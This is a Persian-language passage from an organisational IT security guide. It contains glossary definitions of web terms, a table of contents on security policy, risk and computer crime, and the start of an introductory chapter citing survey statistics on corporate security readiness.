ﻳﻚ ﺁﺩﺭﺱ ﻋﻤـﻮﻣﻲ ﺑـﺮﺍﻱ ﺍﺷـﺎﺭﻩ ﺑـﻪ ﻳـﻚ ﻣﻘـﺼﺪ ﺩﺭ
ﺍﻳﻨﺘﺮﻧﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ http://www.infodev.org/
ﻳﺎ mailto: info@worldbank.org
ﺑﺨﺶ ﺩﻭﻡ
ﻓﺎﻳﻠﻲ ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺩﺭﺧﻮﺍﺳﺖ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ،ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﻧﻮﺷﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺧﻮﺍﻧﺪﻩ
ﻣﻲﺷﻮﺩ .ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﻓﺎﻳـﻞ ﺭﻭﻱ
ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻮﺷﺘﻪ ﺷﻮﺩ ﺗـﺎ ﺑﻌـﺪﻫﺎ ﻫـﻢ ﺑﺘﻮﺍﻧـﺪ ﺁﻧـﺮﺍ
ﻼ ﺍﮔــﺮ ﭘﺎﻳﮕــﺎﻩ ﻭﺑــﻲ ﺍﺯ ﺷــﻤﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ
ﺑﺨﻮﺍﻧــﺪ .ﻣــﺜ ﹰ
ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ ﺩﻳـﺴﻚ
ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺑـﻪ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ
ﻣﺮﺍﺟﻌﻪ ﻣﻲ ﻛﻨﻴﺪ ،ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ cookieﻗﺒﻠﻲ ﺭﺍ ﻣﻲﺧﻮﺍﻧﺪ
ﻭ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﭼﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
١٧٤
Daemon
ﺑﺮﻧﺎﻣﺔ ﻛﻮﭼﻜﻲ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻫﻤﻴﺸﻪ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ
ﺍﺳﺖ ﻭ ﻣﻨﺘﻈﺮ ﻣﻲﻣﺎﻧﺪ ﺗﺎ ﺍﺯ ﺁﻥ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻱ ﺭﺍ ﺑـﺮﺍﻱ
ﻻ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ
ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ .ﭼﻨﻴﻦ ﺩﺭﺧﻮﺍﺳﺘﻲ ﻣﻌﻤﻮ ﹰ
ﺷﺒﻜﻪ ﻭ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ.
HTML
HTMLﻳـــﻚ ﻛﻠﻤـــﺔ ﺍﺧﺘـــﺼﺎﺭﻱ ﺑـــﺮﺍﻱ ﻋﺒـــﺎﺭﺕ
Hyper Text Markup Languageﺍﺳـﺖ .ﺍﻳـﻦ
ﺯﺑﺎﻥ ﻣﺠﻤﻮﻋﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻳـﺎ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ
ﻣﺘﻮﻥ ﻭ ﺗﺼﺎﻭﻳﺮ ﺭﺍ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ ﻭ ﻳﺎ ﻋﻤﻠﻴﺎﺕ ﺩﻳﮕﺮﻱ ﺑﻪ
ﺍﻧﺠﺎﻡ ﺭﺳﺎﻧﻨﺪ .ﻧﻤﻮﻧـﻪ ﺍﻱ ﺍﺯ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺍﻳـﻦ ﺯﺑـﺎﻥ
ﭼﻨﻴﻦ ﺍﺳﺖ:
This sentence is <<Start Bold>> very
<<End Bold>> short.
ﺩﺭ ﺟﻤــﻼﺕ ﻓــﻮﻕ ﻛﻠﻤــﺎﺕ ﺩﺍﺧــﻞ ﻋﻼﻣــﺖ >><<
ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻋﻤﻠﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ .ﺩﺭ ﻧﺘﻴﺠـﺔ
ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻓﻮﻕ ﺟﻤﻠﻪﺍﻱ ﺑﻪ ﺷﻜﻞ ﺯﻳﺮ ﺑـﻪ ﻧﻤـﺎﻳﺶ
ﺩﺭ ﻣﻲﺁﻳﺪ:
This sentence is very short.
174 Universal Resource Locator
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﺼﻞ .۱
ﻣﻘﺪﻣﻪ
ﻓﺼﻞ .۲
ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ ﳐﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻓﺼﻞ .۳
ﺑﺮﺁﻭﺭﺩ ﳐﺎﻃﺮﻩ ﻭ ﲢﻠﻴﻞ ﺯﻳﺎﻥ
ﻓﺼﻞ .۴
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﱵ
ﻓﺼﻞ .۵
ﭘﻴﺸﮕﲑﻱ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﱐ
ﻓﺼﻞ .۶
ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ
ﻓﺼﻞ .۷
ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ
ﻓﺼﻞ .۸
ﺳﻴﺎﺳﺖﻫﺎﻱ ﺣﺮﱘ ﺧﺼﻮﺻﻲ ،ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ،ﻭ ﺗﺪﻭﻳﻦ ﺁﺋﲔﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﱵ
ﻓﺼﻞ .۹
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﻓﺼﻞ .۱۰ﻣﺪﻳﺮﻳﺖ ﳐﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ :ﺧﺪﻣﺎﺕ ﻣﺎﱄ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﳏﻴﻂ ﰊﺳﻴﻢ
ﻓﺼﻞ .۱۱ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ :ﺍﳚﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ
ﻓﺼﻞ .۱۲ﻗﻮﺍﻋﺪ ﺍﳝﲏ ﲡﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﳘﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ
ﻓﺼﻞ .۱۳ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﲔﺍﳌﻠﻠﻲ ﭘﲑﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ
ﺑﻌﻀﻲ ﺷﺎﺧﺼﻬﺎﻱ ﺁﻣﺎﺭﻱ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﺼﻞ ﺍﻭﻝ
ﻣﻘﺪﻣﻪ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺑﺨﺶ ﺩﻭﻡ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ
ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺩ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷـﺪﻩ ﺩﺭ ﺁﻥ
ﻛﺎﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨـﺪ .ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳـﺎﺩﻩ ﺑﺎﺷـﺪ ﻭ ﻫـﺮﻛﺲ ﻣـﺴﺌﻮﻟﻴﺖ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ
ﺑﺮﺍﻱ ﮔﺮﻭﻫﻬﺎﻱ ﺑﺰﺭﮔﺘﺮ ﻣﺜﻞ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺑـﺎ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ
ﺗﺠﺎﺭﻱ ١ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﺔ
ﺷﻬﺮﻭﻧﺪﺍﻥ ﻳﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ ،ﻧﻴـﺎﺯ ﺑـﻪ ﺍﻳﺠـﺎﺩ
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺭﺳﻤﻲ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮ ﺍﻫﻤﻴﺖ ﭘﻴﺪﺍ ﻣﻲﻛﻨـﺪ.
ﻫﻨﮕﺎﻣﻴﻜــﻪ ﻣــﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﻣﻮﺿــﻮﻉ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ -ﭼﻪ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ،
ﭼﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ،ﻭ ﭼـﻪ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﺩﻭﻟﺘـﻲ -
ﻫﻤﻮﺍﺭﻩ ﺑﺎ ﻣﺴﺎﺋﻞ ﻣﺸﺎﺑﻬﻲ ﻣﻮﺍﺟﻪ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ .ﻫﺮ ﮔـﺮﻭﻩ ﺑـﺮﺍﻱ
ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﻧﻴﺎﺯ ﺑﻪ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺷـﻔﺎﻑ
ﻭ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺑﻪﺍﺟﺮﺍ ﺩﺭﺁﻣﺪﻥ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ،ﺗﻮﺍﻧـﺎﻳﻲ ﺍﻳﺠـﺎﺩ ﻭ
ﺣﻔــﻆ ﺁﮔــﺎﻫﻲ ﺍﺯ ﻧﻴﺎﺯﻫــﺎﻱ ﻣــﺸﺘﺮﻳﺎﻥ ،ﻭ ﺩﺭﻛــﻲ ﺍﺯ ﭼﮕــﻮﻧﮕﻲ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ ﻋﻤﻠﻴـﺎﺗﻲ ﺩﺍﺭﺩ.
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻧﻴﺎﺯﻫﺎﻱ ﻛﻠﻲ ،ﻫﺮ ﺩﺳﺘﻪ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻣﻼﺣﻈـﺎﺕ
ﺧﺎﺹ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻫﺪﺍﻑ ﻭ ﻣﺄﻣﻮﺭﻳﺖ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﺩﺍﺭﻧﺪ .ﻣـﺪﻳﺮﺍﻥ
ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻫﺪﺍﻑ ﺗﻌﻴـﻴﻦﺷـﺪﻩ ﺑﺎﻳـﺪ ﺑـﺮ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ
ﺍﻃﻼﻋﺎﺕ ﺗﻮﺟﻪ ﻣﺆﻛﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺩﺭﻙ ﻫﺰﻳﻨﻪﻫـﺎﻱ
ﻲ ﻛﺎﺭﺁ ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘ ﹺ
ﺍﺳﺖ .ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻧـﻮﻋﻲ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺑـﻪ
ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ ﻭ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺿﺎﻳﻌﺎﺕ ﻣﺤﺘﻤـﻞ
ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺗﻮﺻﻴﻪﻫﺎﻱ ﻋﻤﻠـﻲ ﺑﺨـﺶ ﺳـﻮﻡ ﺑـﺎ
ﺩﺭﻛﻲ ﺍﺯ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ -ﻛﻪ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ ﺑـﺎ ﻣﻨـﺎﺑﻊ
ﻣﺤﺪﻭﺩ ﺑﺴﻴﺎﺭ ﺿﺮﻭﺭﻱ ﺍﺳﺖ -ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ.
Commercial Transactions
1
ﺗﺤﻘﻴﻖ ﺟﻬﺎﻧﻲ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺍﺭﻧـﺴﺖ ﻭ ﻳﺎﻧـﮓ ٢ﺩﺭ ﺳـﺎﻝ
۲۰۰۳ﻧــﺸﺎﻥ ﻣــﻲﺩﻫــﺪ ﻛــﻪ %۹۰ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻣﻌﺘﻘﺪﻧــﺪ ﺍﻣﻨﻴــﺖ
ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺁﻧﻬﺎ ﺑﻪ ﺍﻫﺪﺍﻑ ﻛﻠﻲﺷـﺎﻥ ﺑـﺴﻴﺎﺭ ﺣـﺎﺋﺰ
ﺍﻫﻤﻴــﺖ ﺍﺳــﺖ %۷۸ .ﺍﺯ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻋﻨــﻮﺍﻥ ﻛﺮﺩﻧــﺪ ﻛــﻪ ﺍﻭﻟــﻴﻦ
ﻫﺪﻓـﺸﺎﻥ ﺍﺯ ﺗــﻼﺵ ﺑـﺮﺍﻱ ﺗــﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋــﺎﺕ ﻛــﺎﻫﺶ
ﻣﺨﺎﻃﺮﺍﺕ ٣ﻣـﻲﺑﺎﺷـﺪ .ﺍﻳـﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺷـﺎﻣﻞ ۱۰۰۰ﺷـﺮﻛﺖ
ﺛﺮﻭﺗﻤﻨﺪ ﻣﻲﺷﺪﻧﺪ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﻣﺒـﺎﺭﺯﻩ ﺑـﺎ
ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺑﻮﺩﻧﺪ .ﺩﺭ ﺍﺩﺍﻣﺔ ﺍﻳﻦ ﺗﺤﻘﻴﻖ:
•
ﺑﻴﺶ ﺍﺯ %۳۴ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﻗـﺪﺭﺕ
ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻳـﺸﺎﻥ ﺩﺭﺣـﺎﻝ
ﺣﺎﺿﺮ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ ﺭﺍ ﻧﺪﺍﺭﻧﺪ.
•
ﺑــﻴﺶ ﺍﺯ %۳۳ﺍﻇﻬــﺎﺭ ﻣــﻲﻛﻨﻨــﺪ ﻛــﻪ ﺗﻮﺍﻧــﺎﻳﻲ ﺍﺭﺍﺋــﻪ
ﻋﻜﺲﺍﻟﻌﻤﻞ ﻣﻨﺎﺳﺐ ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ
ﻧﺪﺍﺭﻧﺪ.
•
ﺗﻨﻬﺎ %۳۴ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺣﺎﺿـﺮ ﺑـﻪ
ﻲ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﻣﻲﺑﺎﺷﻨﺪ.
ﺍﻃﺎﻋﺖ ﺍﺯ ﺿﻮﺍﺑﻂ ﺍﻣﻨﻴﺘ ﹺ
•
%۵۶ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻮﺩﺟﺔ ﻧﺎﻛﺎﻓﻲ ﺭﺍ ﻣﺎﻧﻊ ﺍﺻﻠﻲ ﺗﺄﻣﻴﻦ ﻣـﺆﺛﺮ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺩﺍﻧﻨﺪ.
•
ﺣﺪﻭﺩ %۶۰ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺎﺯﮔـﺸﺖ
ﺳــﺮﻣﺎﻳﻪ ﺭﺍ ﺑــﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋــﺎﺗﻲ ﺑﻨــﺪﺭﺕ ﻣﺤﺎﺳــﺒﻪ
ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﻫﺮﮔﺰ ﻣﺤﺎﺳﺒﻪ ﻧﻤﻲﻛﻨﻨﺪ.
•
ﺗﻨﻬــﺎ %۲۹ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺁﻣــﻮﺯﺵ ﻭ ﺁﮔــﺎﻫﻲ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﺭﺍ
ﺑﻌﻨﻮﺍﻥ ﻗﺴﻤﺘﻲ ﻛﻪ ﺑﻴﺸﺘﺮﻳﻦ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ
ﻞ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺭﻭﻱ ﺁﻥ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺫﻛﺮ ﻣﻲﻛﻨﻨﺪ؛ ﺩﺭ ﻣﻘﺎﺑـ ﹺ
%۸۳ﻛﻪ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻌﻨﻮﺍﻥ ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ
ﺧﻮﺩ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻧﺎﻡ ﻣﻲﺑﺮﻧﺪ.
•
ﺗﻨﻬﺎ %۳۵ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻴﻮﺳﺘﺔ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ ﺁﻣﻮﺯﺷﻲ ﺩﺍﺭﻧﺪ.
ﺍﻳﻦ ﺁﻣﺎﺭﻫﺎ ﺣﺎﻛﻲ ﺍﺯ ﺍﻳـﻦ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻫﻤـﺔ ﺳـﺎﺯﻣﺎﻧﻬﺎ -ﭼـﻪ
ﻛﻮﭼﻚ ﻭ ﭼﻪ ﺑﺰﺭﮒ -ﻓـﺸﺎﺭﻫﺎﻱ ﻣـﺎﻟﻲ ﻭ ﺭﻭﺍﻧـﻲ ﺗﻬﺪﻳـﺪﻫﺎﻱ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺣﺲ ﻣﻲﻛﻨﻨﺪ .ﻓﺼﻠﻬﺎﻱ ﺁﺗـﻲ ﺍﻳـﻦ
Ernest & Young
Risks
2
3
١٢٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺨﺶ ﺑﻪ ﺍﻭﻟﻮﻳﺘﻬﺎ ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ
ﻣﻲﭘﺮﺩﺍﺯﻧﺪ .ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻦ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻖ ﺍﺭﻧـﺴﺖ ﻭ
ﻳﺎﻧﮓ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﻧﻤـﺎﺩ ﺍﺯ ﭼﺎﻟـﺸﻬﺎﻳﻲ ﻛـﻪ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺍﺩﺍﺭﺍﺕ
ﺗﺠﺎﺭﻱ ﺑﺎ ﺁﻧﻬﺎ ﻣﻮﺍﺟﻪ ﺷﺪﻩﺍﻧﺪ ﺑﻨﻈﺮ ﻣﻔﻴﺪ ﻣﻲﺁﻳﺪ.
ﺗﺠﺎﺭﺗﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ
٤
ﺍﮔﺮ ﺷﻤﺎ ﺑﻪ ﺗﺠﺎﺭﺗﻬـﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ ﻣـﺸﻐﻮﻝ ﻫـﺴﺘﻴﺪ
ﺍﻭﻟﻮﻳﺘﻬــﺎﻱ ﺍﺻــﻠﻲ ﺷــﻤﺎ ﻗﺎﺑﻠﻴــﺖ ﺳــﻮﺩﺁﻭﺭﻱ ،ﺗــﺪﺍﻭﻡ ﺗﺠــﺎﺭﺕ،
ﭘﺎﻳﺪﺍﺭﻱ ،ﻭ ﻛﻴﻔﻴﺖ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺑﻪ ﻣﺸﺘﺮﻱ ﻫﺴﺘﻨﺪ .ﺳﺎﺯﻣﺎﻧﻬﺎﻱ
ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺑﻮﺳﻴﻠﺔ ﻗـﻮﺍﻧﻴﻦ ﻣﺤﻠـﻲ ،ﻧﺎﺣﻴـﻪﺍﻱ ،ﻳـﺎ ﻣﻠـﻲ
ﻣﺤﺪﻭﺩ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺴﺘﻪ ﺑﻪ ﻧﻮﻉ ﺗﺠﺎﺭﺗﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻣﻲﭘﺮﺩﺍﺯﻧـﺪ ﻭ
ﻣﺤﻴﻂ ﺗﺠﺎﺭﻱ ﻛﺸﻮﺭﻱ ﻛﻪ ﺩﺭ ﺁﻥ ﻓﻌﺎﻟﻴـﺖ ﻣـﻲﻛﻨﻨـﺪ ،ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻨﺪ ﻣﺮﻛﺰ ﭘﺎﺳـﺨﮕﻮ ﺑﺎﺷـﻨﺪ .ﺩﺭ ﺍﻳـﻦ
ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺭﻭﻧــﺪ ﺑﺮﻗــﺮﺍﺭﻱ ﺍﻣﻨﻴــﺖ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﻭ
ﻣﺸﺘﺮﻳﺎﻧﺶ ﺩﺭ ﻣﻘﺎﺑﻞ ﻓﺮﻳﺐ ﻭ ﺣﻤﻼﺕ ﺍﺳﺎﺳﻲ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﻋﻠﻴـﻪ
ﺧﺪﻣﺎﺕ ﻭ ﺳﻴـﺴﺘﻤﻬﺎ ﻣﺘﻤﺮﻛـﺰ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ .ﻋـﻼﻭﻩ ﺑـﺮ ﺟـﺮﻡ
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺍﻣﻨﻴــﺖ ﺷــﺒﻜﻪ ،ﺣﻔﺎﻇــﺖ ﺍﺯ ﺩﺍﺩﻩﻫــﺎ ﻧﻴــﺰ ﺑــﺮﺍﻱ
